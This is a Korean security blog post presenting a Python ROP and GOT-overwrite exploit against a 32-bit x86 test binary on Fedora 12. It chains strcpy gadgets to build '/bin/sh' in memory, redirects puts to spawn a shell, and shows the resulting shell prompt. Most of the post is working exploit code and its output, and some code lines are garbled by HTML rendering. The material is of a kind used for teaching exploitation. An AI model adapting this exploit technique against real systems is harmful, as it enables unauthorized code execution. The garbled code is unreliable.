Hacking Arts
[intel][x86] ROP 본문
#!/usr/bin/env python # # # ROP + GOT overwrite # # import struct p = lambda x : struct.pack("<l",x) up="lambda" x="" :="" struct.unpack(">L",x)[0] # var strcpy = p(0x08048374) puts_got = [p(0x804975c),p(0x804975d),p(0x804975e),p(0x804975f)] puts_plt = p(0x8048394) ppr = p(0x8048588) bbs = [p(0x08049774),p(0x08049775),p(0x08049776),p(0x08049778),p(0x08049779),p(0x0804977a),p(0x0804977b)] hex_00 = p(0x0804976c) hex_1d = p(0x0804976e) hex_b7 = p(0x08049770) hex_e0 = p(0x08049772) str_slash = p(0x08048134) str_b = p(0x08048137) str_in = p(0x0804813d) str_s = p(0x08048142) str_h = p(0x0804835a) str_null = p(0x0804833a) # dummy payload = "" payload += "A" * 272 # stage - 1 strcpy(bbs,"/bin/sh") payload += strcpy payload += ppr payload += bbs[0] payload += str_slash payload += strcpy payload += ppr payload += bbs[1] payload += str_b payload += strcpy payload += ppr payload += bbs[2] payload += str_in payload += strcpy payload += ppr payload += bbs[3] payload += str_slash payload += strcpy payload += ppr payload += bbs[4] payload += str_s payload += strcpy payload += ppr payload += bbs[5] payload += str_h payload += strcpy payload += ppr payload += bbs[6] payload += str_null # stage - 1 GOT overwrite ( got_puts) payload += strcpy payload += ppr payload += puts_got[0] payload += hex_e0 payload += strcpy payload += ppr payload += puts_got[1] payload += hex_b7 payload += strcpy payload += ppr payload += puts_got[2] payload += hex_1d payload += strcpy payload += ppr payload += puts_got[3] payload += hex_00 # stage - 0 payload += puts_plt payload += "B" * 4 payload += bbs[0] print (payload) </l",x)>
ROP 환경은
Fedora release 12 커널 2.6
일단 ASLR을 종료한 상태이다.
ulimit -s unlimited로 종료했고 걸려 있는 거는
NX,ASCII amor가 걸려있는 상태였고
페이로드는 ROP와 GOT overwirte두가지 동시에 사용 되었습니다.
./vuln `python vuln.py`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAt
t4t
u7t
v=t
x4t
yBt
zZt
{:t
\rt
]pt
^nt
_lBBBBt
sh-4.0$
이런식으로 실행됩니다.
'System > BOF' 카테고리의 다른 글
[intel][x64] RTL(Return To libc) (0) | 2015.10.31 |
---|---|
[intel][x64] Stack 기반 BOF (0) | 2015.10.22 |
[MIPS][x86] BOF 기본 공격 방식 (0) | 2015.08.17 |
[MIPS][x86] BOF 분석 (0) | 2015.08.17 |
BOF 개론 (0) | 2014.08.27 |